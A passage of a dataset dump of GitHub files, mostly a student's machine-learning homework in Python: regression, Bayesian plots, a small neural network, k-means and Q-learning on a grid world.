len(currentStudent):\n flash('This Student Has been Verified!')\n return redirect(url_for('student_verify', user_id=user_id))\n cursor = g.conn.execute(\n text('insert into students values (:user_id, :university, :student_id)'),\n {'user_id': session['user_id'],\n 'university': form.university.data, 'student_id': form.student_id.data})\n flash('Successfully Verified!')\n session['is_student'] = True\n cursor.close()\n return redirect(url_for('dashboard', user_id=user_id))\n cursor.close()\n return render_template('student_verify.html', form=form, user=user)\n"
}
] | 4 |
almajeas/CS229ML | https://github.com/almajeas/CS229ML | 7f64c9d0584a46c476329c43e894cea119c03274 | 14cadc2b819c12da99e83b29d4cbf32cb57d0ebf | 1950e4939e8371ad8592e49ece920a38dc0104be | refs/heads/master | 2021-01-03T07:59:47.396465 | 2020-05-15T10:47:42 | 2020-05-15T10:47:42 | 239,991,310 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.5570498704910278,
"alphanum_fraction": 0.5746203660964966,
"avg_line_length": 24.74860382080078,
"blob_id": "06d927a3d26d9e8aaf225ff4b14e461ac0c44cf6",
"content_id": "2d4a897403a3e7a554824020d6711fa5da2b1048",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4610,
"license_type": "no_license",
"max_line_length": 97,
"num_lines": 179,
"path": "/HW1/hw1.py",
"repo_name": "almajeas/CS229ML",
"src_encoding": "UTF-8",
"text": "import numpy as np\nimport matplotlib.pyplot as plt\nimport random as rnd\nfrom sklearn.model_selection import train_test_split\n\n\n# Sigmoid\ndef sigmoidMatrix(x, j):\n X = np.empty((len(x), j+1))\n i = 0\n min = np.min(x)\n max = np.max(x)\n step = (max-min) / j\n std = np.std(x)/50\n for xi in x:\n row = np.empty(j+1)\n for n in range(j+1):\n u = n*step\n row[n] = 1 / (1 + np.exp(-1 * (xi-u)/std))\n X[i] = row\n i = i + 1\n return X\n\n# Gaussian\ndef gaussianMatrix(x, j):\n X = np.empty((len(x), j+1))\n i = 0\n min = np.min(x)\n max = np.max(x)\n step = (max-min) / j\n s = np.std(x)\n s = np.mean(x)\n # s = (max-min) / j\n for xi in x:\n row = np.empty(j+1)\n for n in range(j+1):\n u = n*step\n row[n] = np.exp( -1 * ((xi - u)**2 / (2 * s**2)))\n X[i] = row\n i = i + 1\n return X\n\n# Polynomial\ndef polynomialMatrix(x, degree):\n X = np.empty((len(x), degree+1))\n i = 0\n for xi in x:\n row = np.empty(degree+1)\n for n in range(degree+1):\n row[n] = xi**n\n X[i] = row\n i = i + 1\n return X\n\ndef sum_square_error(Y, T):\n return 0.5 * np.sum(np.square(np.subtract(Y, T)))\n\n\n# Read file\nx,t = [], []\nwith open('regression_x_t.txt') as file:\n i = 0\n for line in file:\n xtemp, ttemp = line.split(' ')\n i = i + 1\n x.append(float(xtemp))\n t.append(float(ttemp))\n\n# Split file into training and Test Sets\n\nx_train, x_test, t_train, t_test = train_test_split(x, t, test_size=0.20, random_state=42)\n\n# Convert python list to vector (Matrix)\nt_train = np.array(t_train)\nt_train = np.expand_dims(t_train, axis=1)\n\n# W Coefficients\nj = 20\npolynomial_degree = j\nlearning_rate = 1e-2\n# X = polynomialMatrix(x_train, polynomial_degree)\n# X = gaussianMatrix(x_train, polynomial_degree)\n##############################################################################\n#BGD Sigmoid\nX = sigmoidMatrix(x_train, j)\nW = np.zeros((j+1, 1))\nY = np.dot(X, W)\n\nerr = sum_square_error(Y, t_train)\nerrs = []\nerrs.append(err)\nfor itr in range(20000):\n # W = np.subtract(W , (1/len(t_train)) * learning_rate * np.dot(X.T,np.subtract(Y, t_train)))\n W = np.subtract(W , (1/len(t_train)) * learning_rate * np.dot(X.T,np.subtract(Y, t_train)))\n Y = np.dot(X, W)\n err = sum_square_error(Y, t_train)\n errs.append(err)\n\n\nplt.title(\"HW1.1.a decreasing of error function with the increasing of iteration numbers\")\nplt.plot(errs)\nplt.xlabel(\"x\")\nplt.ylabel(\"Y\")\nplt.show()\nprint(\"HW1.1.b SGD obtained coefficient W\")\nprint(W)\n\nXTest = sigmoidMatrix(x_test, j)\nYTestPredict = np.dot(XTest, W)\nplt.title(\"HW1.1.c predicted f(x) vs. Actual Target t\")\nplt.scatter(x_test, YTestPredict)\nplt.scatter(x_test, t_test)\nplt.show()\nrms = np.sqrt(2 * sum_square_error(YTestPredict, t_test) / len(t_test))\nprint(\"HW1.1.d SGD Test Set RMS: \")\nprint(rms)\n\n\n\n#############################################################################\n#Stochastic \nrandomIndexes = []\nfor i in range(len(t_train)):\n randomIndexes.append(i)\n\nrnd.shuffle(randomIndexes)\nW = np.zeros((j+1, 1))\nY = np.dot(X, W)\nerr = sum_square_error(Y, t_train)\nerrs = []\nerrs.append(err)\nfor itr in range(400):\n for stoc in randomIndexes:\n #get random point\n i = stoc # rnd.randint(0, len(t_train)-1)\n Xi = X[i]\n Xi = np.reshape(Xi, (1,j+1))\n Yi = np.dot(Xi, W)\n grad = Xi.T * np.subtract(Yi, t_train[i])\n W = np.subtract(W , (1.0/j) * learning_rate * grad)\n Y = np.dot(X, W)\n err = sum_square_error(Y, t_train)\n errs.append(err)\n\nplt.title(\"HW1.2.a decreasing of error function with the increasing of iteration numbers\")\nplt.plot(errs)\nplt.xlabel(\"x\")\nplt.ylabel(\"Y\")\nplt.show()\n\nprint(\"HW1.2.b Stochastic obtained coefficient W\")\nprint(W)\n\nYTestPredict = np.dot(XTest, W)\nplt.title(\"HW1.2.c predicted f(x) vs. Actual Target t\")\nplt.scatter(x_test, YTestPredict)\nplt.scatter(x_test, t_test)\nplt.show()\nrms = np.sqrt(2 * sum_square_error(YTestPredict, t_test) / len(t_test))\n\nprint(\"Stochastic RMS: \")\nprint(rms)\n\n\n#############################################################################\n#Maximum likelihood \n\nMLHW = np.dot( np.dot( np.linalg.inv( np.dot(X.T, X)), X.T), t_train)\nYTestPredict = np.dot(XTest, MLHW)\nplt.title(\"HW1.3.c predicted f(x) vs. Actual Target t\")\nplt.scatter(x_test, YTestPredict)\nplt.scatter(x_test, t_test)\nplt.show()\nrms = np.sqrt(2 * sum_square_error(YTestPredict, t_test) / len(t_test))\nprint(\"HW1.3.a Maximum Likelihood W\")\nprint(MLHW)\n\nprint(\"HW1.3.d Maximum Likelihood RMS: \")\nprint(rms)\n\n"
},
{
"alpha_fraction": 0.4920634925365448,
"alphanum_fraction": 0.5063223242759705,
"avg_line_length": 32.19643020629883,
"blob_id": "d821698fa9b2df8b50a67638461118c1e233fa42",
"content_id": "da19e642c4f3592bfa261757c35ac11a5c145a77",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3717,
"license_type": "no_license",
"max_line_length": 248,
"num_lines": 112,
"path": "/HW4/kmeans.py",
"repo_name": "almajeas/CS229ML",
"src_encoding": "UTF-8",
"text": "import random\nimport time\nimport math\nimport numpy as np\nimport matplotlib.pyplot as plt\ndef sse(centroids, pts):\n sum = 0\n for i, centroid in enumerate(centroids):\n for pt in pts[i]:\n sum += math.sqrt((centroid[0] - pt[0])**2 + (centroid[1] - pt[1])**2)\n return sum\n\ndef distance(a, b):\n return math.sqrt((a[0] - b[0])**2 + (a[1] - b[1])**2)\n\npoints = []\nwith open('clu_data.txt') as file:\n for line in file:\n xtemp, ytemp = line.split(' ')\n points.append((float(xtemp), float(ytemp)))\n\n\nminX, maxX = min(points)[0], max(points)[0]\nminY, maxY = min(points)[1], max(points)[1]\nprint(f\"minX = {minX}, MaxX = {maxX}, minY = {minY}, maxY = {maxY} \")\n\nepochs = 40\ncolors = ['maroon', 'b', 'g', 'r', 'c', 'm', 'y', 'k', 'orange', 'gold', 'teal', 'brown', 'coral', 'khaki', 'lime', 'magenta', 'olive', 'navy', 'lavender', 'grey', 'gold', 'darkgreen', 'silver', 'wheat', 'orchid', 'pink', 'purple', 'tan', 'sienna']\nax = plt.gca()\nthreshold = 0.02\nsse_data = {}\nKmeansRange = range(2, 22)\nfor K in KmeansRange:\n sse_data[K] = []\n for trial in range(10):\n converged = False\n Ks = []\n clusters = {}\n for k in range(K):\n x = random.uniform(minX, maxX)\n y = random.uniform(minY, maxY)\n Ks.append((x, y))\n\n for epoch in range(epochs):\n if converged:\n s = f\"output/K-{K}-trial-{trial+1}-converged-{epoch+1}.png\"\n plt.savefig(s)\n print(f\"K = {K}, Trial {trial}, Converged by epoch {epoch}\")\n print(f\"K={K}, Trial #{trial+1}, Epoch #{epoch+1}, SSE={sse(Ks, clusters)}\")\n # plt.pause(1)\n plt.close()\n break\n else:\n plt.close()\n for k in range(K):\n clusters[k] = []\n\n for i in range(len(points)):\n closestCluster = 0\n d = distance(Ks[0], points[i])\n for k in range(1, K):\n dTemp = distance(Ks[k], points[i])\n if dTemp < d:\n d = dTemp\n closestCluster = k\n clusters[closestCluster].append(points[i])\n for k in range(K):\n x_val = [x[0] for x in clusters[k]]\n y_val = [x[1] for x in clusters[k]]\n color = next(ax._get_lines.prop_cycler)['color']\n plt.xlabel(\"x\")\n plt.ylabel(\"y\")\n plt.scatter(x_val,y_val, color=colors[k])\n plt.scatter(Ks[k][0], Ks[k][1], marker='+', color=colors[k])\n sse_data[K].append(sse(Ks, clusters))\n plt.title(f\"K={K}, Trial #{trial+1}, Epoch #{epoch+1}, SSE={sse_data[K][-1]:.2f}\")\n plt.show(block=False)\n converged = True\n for k in range(K):\n if len(clusters[k])> 0:\n mean = np.mean(clusters[k], axis=0)\n mean = (mean[0], mean[1])\n if distance(mean, Ks[k]) > threshold:\n converged = False\n Ks[k] = mean\n\nks = []\nsses = []\nfor K in KmeansRange:\n print(f\"{K} -- {min(sse_data[K])}\")\n ks.append(K)\n sses.append(min(sse_data[K]))\nplt.clf()\nplt.title(\"Sum Square Errors vs K\")\nplt.xlabel(\"K\")\nplt.ylabel(\"SSE\")\nplt.scatter(ks, sses , color=colors[0])\nprint(ks)\nprint(sses)\ns = f\"output/ScatterSSEoverBestKs-{KmeansRange[0]}-{KmeansRange[-1]}.png\"\nplt.savefig(s)\nplt.show()\n\n\nplt.clf()\nplt.title(\"Sum Square Errors vs K\")\nplt.xlabel(\"K\")\nplt.ylabel(\"SSE\")\nplt.plot(ks, sses , color=colors[0])\ns = f\"output/PlotSSEoverBestKs-{KmeansRange[0]}-{KmeansRange[-1]}.png\"\nplt.savefig(s)\nplt.show()"
},
{
"alpha_fraction": 0.6172516942024231,
"alphanum_fraction": 0.633432924747467,
"avg_line_length": 34.87053680419922,
"blob_id": "94a2f57d88873b94935bfe53210ab8a63d81eede",
"content_id": "65d6cd422021be4173505b7c0e790be5aeb600e6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 8034,
"license_type": "no_license",
"max_line_length": 133,
"num_lines": 224,
"path": "/HW3/hw3.py",
"repo_name": "almajeas/CS229ML",
"src_encoding": "UTF-8",
"text": "import numpy as np\nfrom sklearn.model_selection import train_test_split\nimport matplotlib.pyplot as plt\nimport matplotlib.patches as mpatches\n\n# Generate Nonlinear samples y = x1 + x2**2 + (x1 - cos(x2))**2\ndef nonlinearfunction(x):\n output = []\n output.append(x[:,0] + x[:,1]**2 + (x[:,0] - np.cos(x[:,1]))**2 + np.random.normal(0, 0.1, len(x)))\n return np.array(output).T\n\n# sigmoid activation function\ndef sigmoid(x):\n return 1.0 / (1.0 + np.exp(-1.0 * x))\n\n#sigmoid derivative function\ndef sigmoidDerivative(x):\n return sigmoid(x) * (1 - sigmoid(x))\n\n#ReLU Activation Function\ndef ReLU(x):\n return x * (x > 0)\n\n#ReLU Derivative function\ndef ReLUDerivative(x):\n x[x<=0] = 0\n x[x>0] = 1\n return x\n\n#Activation function in Use\ndef activation(x):\n return sigmoid(x)\n # return ReLU(x)\n\n#derivative function in use\ndef activationDerivative(x):\n return sigmoidDerivative(x)\n # return ReLUDerivative(x)\n\n#Root Mean Square Error function\ndef RMSE(y, t):\n return np.sqrt(np.sum((y - t.T)**2))/ len(y)\n\nepochs = 200 # number of epochs\nlearning_rate = 0.0001 # learning rate\ninput_dimensions = 2 #Input variables for the NN first layer\ninput_points = 1250 # total generated samples\noutput_dimensions = 1 #output of the NN layer\n\n# Generate re()\n# BGD_Adadelta()andom samples + noise\nX = np.random.uniform(low=0, high=1, size=(input_points, input_dimensions))\n\n# Calculate Ground Truth for the generated samples using non-linear function\nT = nonlinearfunction(X)\n\n#Split into Training and Test Sets\nx_train, x_test, t_train, t_test = train_test_split(X, T, test_size=0.20, random_state=42)\n\n# Define Neural Network\n\n## structure of NN in array from, each element is a layer.\n## starting with input layer and ending with output layer\nneurons_per_layer = np.array([input_dimensions, 2, output_dimensions])\n\n\nNN = list() ##Neural Network object\nW = list() ## Weights\nWgrad = list() ## Weights gradient calculations (back propagation)\nB = list() ## Biases\nBgrad = list() ## Biases gradient calculations (back propagation)\nWgrads = list()## AdaGrad time sum gradients for W\nBgrads = list()## AdaGrad time sum gradients for biases\nEg2W = list()##RMSprob sum for square gradients of W\nEg2B = list()##RMSprob sum for square gradients of B\n## Initialize Weights, Biases, Gradients\ndef initialize():\n ##Initialize NN\n NN.clear() ##Neural Network object\n W.clear() ## Weights\n Wgrad.clear() ## Weights gradient calculations (back propagation)\n B.clear() ## Biases\n Bgrad.clear() ## Biases gradient calculations (back propagation)\n Wgrads.clear() ## AdaGrad time sum gradients for W\n Bgrads.clear() ## AdaGrad time sum gradients for biases\n Eg2W.clear() ##RMSprob sum for square gradients of W\n Eg2B.clear() ##RMSprob sum for square gradients of B\n for i in range(len(neurons_per_layer)):\n NN.append(np.zeros((neurons_per_layer[0], 1)))\n for i in range(len(neurons_per_layer) -1 ):\n W.append(np.random.randn(neurons_per_layer[i+1], neurons_per_layer[i]))\n Wgrad.append(np.zeros((neurons_per_layer[i+1], neurons_per_layer[i])))\n Wgrads.append(np.zeros((neurons_per_layer[i+1], neurons_per_layer[i])))\n Eg2W.append(np.zeros((neurons_per_layer[i+1], neurons_per_layer[i])))\n B.append(np.random.randn(neurons_per_layer[i+1] , 1))\n Bgrad.append(np.zeros((neurons_per_layer[i+1] , 1)))\n Bgrads.append(np.zeros((neurons_per_layer[i+1] , 1)))\n Eg2B.append(np.zeros((neurons_per_layer[i+1] , 1)))\n\n\n## forward pass \ndef forward():\n for i in range(len(W)):\n NN[i+1] = np.dot(W[i], NN[i]) + B[i]\n## back propagation (l is the current layer, seg is the error, Z is the input)\ndef backpropagate(l, seg, Z):\n if l < 0:\n return \n Wgrad[l] = np.dot(seg, Z.T)\n Bgrad[l] = np.sum(seg, axis=1, keepdims=True)/len(x_train)\n backpropagate(l-1, activationDerivative(NN[l]) * np.dot(W[l].T, seg), activation(NN[l-1]) )\n return\n\n\n## Neural Network training. BGD\ndef BGD():\n ##lists to keep track of errors for plotting.\n training_errors = []\n testing_errors = []\n for epoch in range(epochs):\n NN[0] = x_train.T\n forward()\n backpropagate(len(Wgrad) -1 , np.subtract(NN[-1], t_train.T), activation(NN[-2]))\n for l in range(len(W)):\n W[l] = W[l] - learning_rate * Wgrad[l]\n B[l] = B[l] - learning_rate * Bgrad[l]\n training_errors.append(RMSE(NN[-1],t_train))\n NN[0] = x_test.T \n forward()\n testing_errors.append(RMSE(NN[-1], t_test))\n print(f\"{epoch} - {training_errors[-1]}\")\n\n # # plotting for HW\n # plt.title(f\"HW3.2.1 RMSE with epochs on Training Set\\nNeural Network Layers: {neurons_per_layer}\")\n # plt.plot(training_errors, color='orange', label='Training Set')\n # plt.xlabel(\"Epochs\")\n # plt.ylabel(\"Error\")\n # plt.legend()\n # plt.show()\n\n plt.title(f\"HW3.2.2 RMSE with epochs on Training and Testing Sets\\nNeural Network Layers: {neurons_per_layer}\")\n plt.plot(training_errors, color='orange', label='Training Set')\n plt.plot(testing_errors, color='green', label=\"Testing Set\")\n plt.xlabel(\"Epochs\")\n plt.ylabel(\"Error\")\n plt.legend()\n plt.show()\n\n\n # plt.title(f\"HW3.Bonus Baseline BGD RMSE with epochs on Training and Testing Sets\\nNeural Network Layers: {neurons_per_layer}\")\n # plt.plot(training_errors, color='orange', label=f'BGD Training Set')\n # plt.plot(testing_errors, color='green', label=f\"BGD Testing Set\")\n # plt.xlabel(\"Epochs\")\n # plt.ylabel(\"Error\")\n # plt.legend()\n\ndef BGD_AdaGrad():\n epsilon = 10e-8\n learning_rate = 1\n ##lists to keep track of errors for plotting.\n training_errors = []\n testing_errors = []\n for epoch in range(epochs):\n NN[0] = x_train.T\n forward()\n backpropagate(len(Wgrad) -1 , np.subtract(NN[-1], t_train.T), activation(NN[-2]))\n training_errors.append(RMSE(NN[-1],t_train))\n for l in range(len(W)):\n Wgrads[l] += Wgrad[l]**2\n Bgrads[l] += Bgrad[l]**2\n W[l] = W[l] - ((learning_rate/ np.sqrt(epsilon + Wgrads[l])) * Wgrad[l])\n B[l] = B[l] - ((learning_rate/ np.sqrt(epsilon + Bgrads[l])) * Bgrad[l])\n NN[0] = x_test.T \n forward()\n testing_errors.append(RMSE(NN[-1], t_test))\n print(f\"{epoch} - {training_errors[-1]}\")\n\n plt.title(f\"HW3.Bonus AdaGrad RMSE with epochs on Training and Testing Sets\\nNeural Network Layers: {neurons_per_layer}\")\n plt.plot(training_errors, color='red', label='AdaGrad Training Set')\n plt.plot(testing_errors, color='blue', label=\"AdaGrad Testing Set\")\n plt.xlabel(\"Epochs\")\n plt.ylabel(\"Error\")\n plt.legend()\n plt.show()\n\n\n\ndef BGD_RMSprop():\n gamma = 0.9\n epsilon = 10e-8\n ##lists to keep track of errors for plotting.\n training_errors = []\n testing_errors = []\n for epoch in range(epochs):\n NN[0] = x_train.T\n forward()\n backpropagate(len(Wgrad) -1 , np.subtract(NN[-1], t_train.T), activation(NN[-2]))\n training_errors.append(RMSE(NN[-1],t_train))\n for l in range(len(W)):\n Eg2W[l] = (1 - gamma)*Wgrad[l]**2 + gamma * Eg2W[l]\n Eg2W[l] = (1 - gamma)*Wgrad[l]**2 + gamma * Eg2B[l]\n W[l] = W[l] - ((learning_rate/ np.sqrt(epsilon + Eg2W[l])) * Wgrad[l])\n B[l] = B[l] - ((learning_rate/ np.sqrt(epsilon + Eg2B[l])) * Bgrad[l])\n NN[0] = x_test.T \n forward()\n testing_errors.append(RMSE(NN[-1], t_test))\n print(f\"{epoch} - {training_errors[-1]}\")\n\n plt.title(f\"HW3.Bonus AdaGrad RMSprop RMSE with epochs on Training and Testing Sets\\nNeural Network Layers: {neurons_per_layer}\")\n plt.plot(training_errors, color='magenta', label='RMSprob Training Set')\n plt.plot(testing_errors, color='gray', label=\"RMSprob Testing Set\")\n plt.xlabel(\"Epochs\")\n plt.ylabel(\"Error\")\n plt.legend()\n plt.show()\n\ninitialize()\nBGD()\n\n# initialize()\n# BGD_AdaGrad()\n\n# initialize()\n# BGD_RMSprop()"
},
{
"alpha_fraction": 0.5765158534049988,
"alphanum_fraction": 0.6025024056434631,
"avg_line_length": 29.2718448638916,
"blob_id": "25a1338e47012e14419c21ec6c716eb215c507a5",
"content_id": "e2046d6374bbcaac28cf56405159baf182797d3d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3117,
"license_type": "no_license",
"max_line_length": 156,
"num_lines": 103,
"path": "/HW2/hw2.py",
"repo_name": "almajeas/CS229ML",
"src_encoding": "UTF-8",
"text": "import numpy as np\nimport matplotlib.pyplot as plt\nimport random as rnd\nimport seaborn as sns\nimport pandas as pd\nfrom sklearn.model_selection import train_test_split\n\ndef calc_t(x):\n return -0.3 + 0.5 * x\n\ndef prior(W, m, cov):\n return np.exp((-1.0/2)*(W-m).T.dot(np.dot(np.linalg.inv(cov),(W-m))))\n\ndef plot_sampled_points(X, t):\n points = pd.DataFrame({'x': X[:, 0], 'y': t[:, 0]})\n sns.lmplot(x='x', y='y', data=points , height=40)\n lim = 1.3\n plt.xlim(-lim, lim)\n plt.ylim(-lim, lim)\n plt.show()\n\n#data range\nlim = 1.0\nr = np.arange(-lim, lim, 0.05)\nnum = len(r)\n\n#plot configuration initialization\nrows = num \ncols = 3\nfig, axes = plt.subplots(rows,cols, figsize=(cols*4 , rows*4 ), dpi=100)\nfig.subplots_adjust(hspace = 0.3, wspace=0.3)\naxs = axes.ravel()\npltctr = 0\n\n#Parameter Initialization\nalpha = 2.0\nbeta = 25\nmu = 0 \nsigma = 0.2\ncovariance_matrix = (1/alpha) * np.identity(2, dtype=float)\n\n#Matrix population\nW = np.zeros((2, 1))\nX = np.random.uniform(-lim, lim, len(r))\nX = np.reshape(X,(len(X), 1))\nt = np.empty(X.shape)\n\n#Calculating t and addition noise\nfor i in range(len(X)):\n t[i] = calc_t(X[i])+ np.random.normal(mu, 1/beta)\nposterior_matrix = np.ones((len(X), len(t)))\nlikelihood_matrix = np.ones((len(X), len(t)))\n\n\nfor ctr in range(num):\n for i, w0 in enumerate(r):\n for j, w1 in enumerate(r):\n if ctr == 0:\n posterior_matrix[j][i] = prior(np.array([[w0], [w1]]), 0, covariance_matrix)\n likelihood_matrix[j][i] = np.exp((-beta/2.0) * (t[ctr] - (w0 + w1*X[ctr]))**2)\n \n ## Plotting Prior/Posterior\n pltctr += 1\n axs[pltctr].set_xlim([-lim, lim])\n axs[pltctr].set_ylim([-lim, lim])\n axs[pltctr].contourf(r, r, posterior_matrix, cmap='jet')\n axs[pltctr].set_title(\"Prior/Posterior\")\n axs[pltctr].set(xlabel='w0', ylabel='w1')\n axs[pltctr].plot(-0.3, 0.5, marker=\"+\", color='w')\n \n ##Sampling and plotting dataspace\n pltctr += 1\n for i in range(6):\n xs, ys = np.unravel_index(np.random.choice(posterior_matrix.size, p=posterior_matrix.ravel()/float(posterior_matrix.sum())), posterior_matrix.shape)\n w1 = 2 * ((xs)/(len(r))) - 1 #Normalize index to -1, 1\n w0 = 2 * ((ys)/(len(r))) - 1 #Normalize index to -1, 1\n x = np.linspace(-1,1,len(r))\n y = w1*x + w0\n axs[pltctr].plot(x, y, '-r')\n markersX = []\n markersY = []\n for k in range(ctr+1):\n markersX.append(X[k])\n markersY.append(t[k])\n axs[pltctr].plot(markersX, markersY, 'o', markerfacecolor='none')\n axs[pltctr].set_xlim([-lim, lim])\n axs[pltctr].set_ylim([-lim, lim])\n axs[pltctr].set(xlabel='x', ylabel='y')\n axs[pltctr].set_title(\"Data space\")\n\n posterior_matrix = posterior_matrix * likelihood_matrix\n if ctr == num - 1:\n break\n ##Plotting likelihood\n pltctr += 1\n axs[pltctr].set_xlim([-lim, lim])\n axs[pltctr].set_ylim([-lim, lim])\n axs[pltctr].contourf(r, r, likelihood_matrix, cmap='jet')\n axs[pltctr].set_title(\"Likelihood\")\n axs[pltctr].set(xlabel='w0', ylabel='w1')\n\nplt.savefig('./plt.png')\n# plt.show()"
},
{
"alpha_fraction": 0.5409918427467346,
"alphanum_fraction": 0.5530445575714111,
"avg_line_length": 42.49726867675781,
"blob_id": "2937e88a64a3fc642249c0b057983bf2e2832175",
"content_id": "3c17830997e419deac261d37f641b2df3d0610a8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 7965,
"license_type": "no_license",
"max_line_length": 203,
"num_lines": 183,
"path": "/HW5/qlearning.py",
"repo_name": "almajeas/CS229ML",
"src_encoding": "UTF-8",
"text": "import numpy as np\n\nOFF_POLICY = 0\nSARSA = 1\nUP = 0\nRIGHT = 1\nDOWN = 2\nLEFT = 3\nlr = 1\ny = 0.9\nPENALTY = -1\n\nclass Node:\n def __init__(self,reward=0, up=0.0, right=0.0, down=0.0, left=0.0):\n self.values = np.array([up, right, down, left], dtype=np.dtype('Float64'))\n self.reward = reward\n def get_max_value(self):\n return np.amax(self.values)\n def get_max_direction(self):\n maximum_locations = np.where(self.values == np.amax(self.values))\n return maximum_locations[0]\n def __str__(self):\n s = f\"{self.values}\"\n return s\n\nclass RL:\n def __init__(self, mode=OFF_POLICY, epochs=1000, epsilon=0.2):\n self.mode = mode\n self.debug = False\n self.epsilon = epsilon\n self.epochs = epochs\n self.init_message()\n self.rows, self.columns = 4, 5\n self.grid = np.full((self.rows,self.columns),Node(), dtype=Node)\n rows, columns = self.grid.shape\n for row in range(rows):\n for col in range(columns):\n self.grid[row, col] = Node()\n self.grid[0,0] = Node(reward=10)\n self.grid[1,3] = Node(reward=-5)\n self.start = (self.rows-1, self.columns-1)\n self.current_loc = self.start\n def init_message(self):\n if self.mode == SARSA:\n print(f\"Initializing... mode = SARSA, epochs = {self.epochs}, debug = {self.debug}\")\n else:\n print(f\"Initializing... mode = QLearning OffPolicy, epochs = {self.epochs}, epsilon = {self.epsilon} debug = {self.debug}\")\n def p(self):\n rows, columns = self.grid.shape\n for row in range(rows):\n s = \"\"\n for col in range(columns):\n s += f\"{self.grid[row, col]} \"\n print(s)\n def step(self):\n # if self.mode == SARSA and np.random.rand() < self.epsilon:\n # selected_direction = np.random.randint(0,len(self.grid[self.current_loc].values))\n # else:\n # directions = self.grid[self.current_loc].get_max_direction()\n # selected_direction = directions[np.random.randint(0,len(directions))]\n # side, newLoc , reward = self.get_next_loc(selected_direction)\n # if self.debug:\n # print(f\"{self.grid[self.current_loc].values[selected_direction]} + {lr} * ({reward} + {y}*{self.grid[newLoc].get_max_value()}\")\n # print(f\"{self.grid[self.current_loc].values[selected_direction]}\")\n # if self.train:\n # self.grid[self.current_loc].values[selected_direction] += lr * (reward + y*self.grid[newLoc].get_max_value() - self.grid[self.current_loc].values[selected_direction])\n if self.mode == OFF_POLICY :\n if np.random.rand() < self.epsilon:\n selected_direction = np.random.randint(0,len(self.grid[self.current_loc].values))\n else:\n directions = self.grid[self.current_loc].get_max_direction()\n selected_direction = directions[np.random.randint(0,len(directions))]\n side, newLoc , reward = self.get_next_loc(selected_direction)\n if self.train:\n self.grid[self.current_loc].values[selected_direction] += lr * (reward + y*self.grid[newLoc].get_max_value() - self.grid[self.current_loc].values[selected_direction])\n else:\n if np.random.rand() < self.epsilon:\n selected_direction = np.random.randint(0,len(self.grid[self.current_loc].values))\n else:\n directions = self.grid[self.current_loc].get_max_direction()\n selected_direction = directions[np.random.randint(0,len(directions))]\n side, newLoc , reward = self.get_next_loc(selected_direction)\n if self.train:\n if np.random.rand() < self.epsilon:\n self.grid[self.current_loc].values[selected_direction] += lr * (reward + y*self.grid[newLoc].values[np.random.randint(0,4)] - self.grid[self.current_loc].values[selected_direction])\n else:\n self.grid[self.current_loc].values[selected_direction] += lr * (reward + y*self.grid[newLoc].get_max_value() - self.grid[self.current_loc].values[selected_direction])\n if self.debug:\n print(f\"{self.grid[self.current_loc].values[selected_direction]} + {lr} * ({reward} + {y}*{self.grid[newLoc].get_max_value()}\")\n print(f\"{self.grid[self.current_loc].values[selected_direction]}\")\n Qstar = self.grid[self.current_loc].values[selected_direction]\n loc = self.current_loc\n if newLoc == (0,0) :#or newLoc == (1,3):\n self.current_loc = self.start\n return loc, side, newLoc, Qstar\n self.current_loc = newLoc\n return loc, side, newLoc, Qstar\n def get_next_loc(self,direction):\n row, col = self.current_loc\n if direction == UP:\n if row == 0:\n return \"UP\", self.current_loc, PENALTY\n else:\n return \"UP\", (row-1, col), self.grid[(row-1, col)].reward\n if direction == RIGHT:\n if col == self.columns - 1:\n return \"RIGHT\", self.current_loc, PENALTY\n else:\n return \"RIGHT\", (row, col+1), self.grid[(row, col+1)].reward\n if direction == DOWN:\n if row == self.rows - 1:\n return \"DOWN\", self.current_loc, PENALTY\n else:\n return \"DOWN\", (row+1, col), self.grid[row+1, col].reward\n if direction == LEFT:\n if col == 0:\n return \"LEFT\", self.current_loc, PENALTY\n else:\n return \"LEFT\", (row, col-1), self.grid[(row, col-1)].reward\n def learn(self):\n self.train = True\n for _ in range(self.epochs):\n self.step()\n self.trainl = False\n def print_result(self):\n self.mode = OFF_POLICY\n self.epsilon = 0\n self.current_loc = self.start\n s, l = self.start\n while l != (0,0):\n loc, s, l, qstar = self.step()\n print(f\"from {loc} go {s} to {l} - Q* = {qstar:0.2f}\")\n self.p()\n def print_Q_summary(self):\n self.mode = OFF_POLICY\n self.epsilon = 0\n print(\"Q* Summary: \")\n for row in range(self.rows):\n for col in range(self.columns):\n s = f\"Q*({(row, col)}) => \"\n s += f\"Up: {self.grid[row, col].values[UP]:0.2f}, \"\n s += f\"Right: {self.grid[row, col].values[RIGHT]:0.2f}, \"\n s += f\"Down: {self.grid[row, col].values[DOWN]:0.2f}, \"\n s += f\"Left: {self.grid[row, col].values[LEFT]:0.2f}\"\n print(s)\n def print_V_summary(self):\n self.mode = OFF_POLICY\n self.epsilon = 0\n print(\"V* Summary: \")\n vals = np.empty((self.rows, self.columns))\n directions = np.empty((self.rows, self.columns),dtype=str)\n for row in range(self.rows): \n for col in range(self.columns):\n direction = self.grid[row, col].get_max_direction()[0]\n value = self.grid[row, col].get_max_value()\n s = f\"V*({(row, col)}) => {self.direction_string(direction)} = {value:0.2f}\"\n vals[row][col] = f\"{value:0.2f}\"\n directions[row][col] = self.direction_string(direction)\n # print(s)\n print(vals)\n print(directions)\n def direction_string(self, direction):\n if direction == UP:\n return \"Up\"\n elif direction == RIGHT:\n return \"Right\"\n elif direction == DOWN:\n return \"Down\"\n elif direction == LEFT:\n return \"Left\"\n else:\n return \"Unknown Direction\"\nq = RL(mode=OFF_POLICY, epochs=20000)\nq.learn()\nq.print_result()\nq.print_Q_summary()\nq.print_V_summary()\n\nq = RL(mode=SARSA, epochs=200000, epsilon=0.1)\nq.learn()\nq.print_result()\nq.print_Q_summary()\nq.print_V_summary()\n\n\n\n\n\n"
}
] | 5 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.